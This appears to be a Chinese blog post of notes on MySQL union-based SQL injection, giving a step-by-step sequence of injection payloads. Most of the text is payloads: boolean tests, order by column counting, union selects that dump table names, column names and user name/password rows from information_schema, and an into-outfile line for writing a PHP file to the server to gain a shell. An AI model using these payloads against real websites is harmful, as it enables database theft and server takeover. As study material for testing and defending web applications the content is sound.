美文网首页
sql注入篇——联合注入篇

sql注入篇——联合注入篇

作者: 萨满原子 | 来源:发表于2019-06-29 16:50 被阅读0次

注入常用函数

version() 查询版本

loadfile() 读文件

select (*表示所有。填写字段名就显示哪些)

desc 表名 显示数据库字段名

group_concat(字段名)列出所有名

sql注入类型分为两大类

字符型  和 整型

导出数据库别名拿shell

select '<?php phpinfo();?>' into uotfile '物理路径'

html描点,注释

#注释,--注释,--+注释,where '1'='1条件成立

读文件

load_file()读文件

排序

order by   排序  ASC(升序) 或 DESC(降序)

group by  判断字段(列)

联合查询注入

select * from 表名 union select 1,2,3,4 必须和表里字段匹配

mysql跨库查询 select * from 库名.表名

查表 union select 1,TABLE_NAME,2 from information_schema.tables where table_schema=database()

先判断注入: and 1=1 --+和and 1=2 --+

然后查询字段:用order by 最终查出是4个字段 order by 4 --+

然后爆出显示位显示位:and 1=2 union select 1,2,3,4 --+

爆出数据库名:database()

爆出数据表:union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='' --+

爆出表里的字段:union select 1,group_concat(column_name),3,4 from information_schema.cloumns where table_name='' --+

爆出数据:union select 1,name,password,4 from ''.'' limit 1,1 --+

相关文章

  • sql注入篇——联合注入篇

    注入常用函数 version() 查询版本 loadfile() 读文件 select (*表示所有。填写字段名就...

  • 小迪16期-20170226

    第二天:Sql注入集锦篇 1.Sql注入之access注入 2.Sql注入之mysql注入 3.Sql注入之mss...

  • 一步一步学习 Web 安全 2.4 union 联合查询注入

    对 SQL 注入有一个大致的了解后,我们再来深入学习。 SQL 注入有联合查询注入、报错注入、布尔盲注、时间盲注等...

  • 小迪16期-20170305

    第三天:Sql注入技巧篇 1.Sql注入之access注入 access数据库结构数据库表名数据库列名数据 1.a...

  • web常见漏洞的成因和修复

    1.SQL注入 漏洞描述:SQL 注入攻击( SQL Injection ),简称注入攻击、SQL 注入,主要用于...

  • sql注入之双查询注入

    在另外一篇文章中,用到了双查询注入,特在此详细讲解一下双查询注入。 另一篇文章传送门:sql注入那些事儿——如何优...

  • Less1

    基于报错的sql注入 字符型注入 数字型 括号型推测sql语句 **union ** 联合查询的方法,主要利用my...

  • 笔记:web漏洞

    SQL注入 SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,...

  • 【DVWA】SQL注入篇

    0x01 Low SQL Injection 最简单的注入,没有任何过滤,常规语句注入即可: SQL Inject...

  • ThinkPHP之SQL注入

    今天分享一个Thinkphp安全方面的知识:SQL注入篇 1. 什么是SQL注入? 利用现有应用程序,将(恶意)的...

网友评论

      本文标题:sql注入篇——联合注入篇

      本文链接:https://www.haomeiwen.com/subject/auxyqctx.html